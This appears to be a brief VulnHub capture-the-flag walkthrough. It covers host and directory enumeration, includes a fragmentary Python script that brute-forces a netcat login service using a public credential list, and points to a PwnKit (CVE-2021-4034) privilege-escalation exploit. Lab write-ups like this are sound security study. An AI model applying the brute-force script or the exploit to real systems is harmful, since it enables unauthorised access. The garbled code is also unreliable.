Vuln Hub
Vuln Hub
Download
Services enumeration
sudo arp-scan -l
nmap 192.168.233.138
No robots.txt
No comments in page source code
gobuster dir -u http://192.168.233.138/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-
medium.txt -x html,xml,php,js
/images and /%7echeckout%7e 403 - Forbidden
This port hosts a python web server. We see a list of tickets with a number, an ID, a title, a status and
a link
This port hosts a custom application that we can connect to via netcat. It requires an authentication.
Brute forcing the authentication
#!/usr/bin/env python3
# https://raw.githubusercontent.com/shipcod3/Piata-Common-Usernames-
and-Passwords/master/userpass.txt
with open('userpass.txt') as f:
data = f.readlines()
s.recvuntil('username> ')
s.sendline(username)
s.recvuntil('password> ')
s.sendline(password)
msg = s.recvline()
if b'authentication failed' not in msg:
print("[+] Valid credentials found: {}:{}".format(username,
password))
sys.exit(0)
s.close()
https://github.com/arthepsy/CVE-2021-4034
Download PwnKit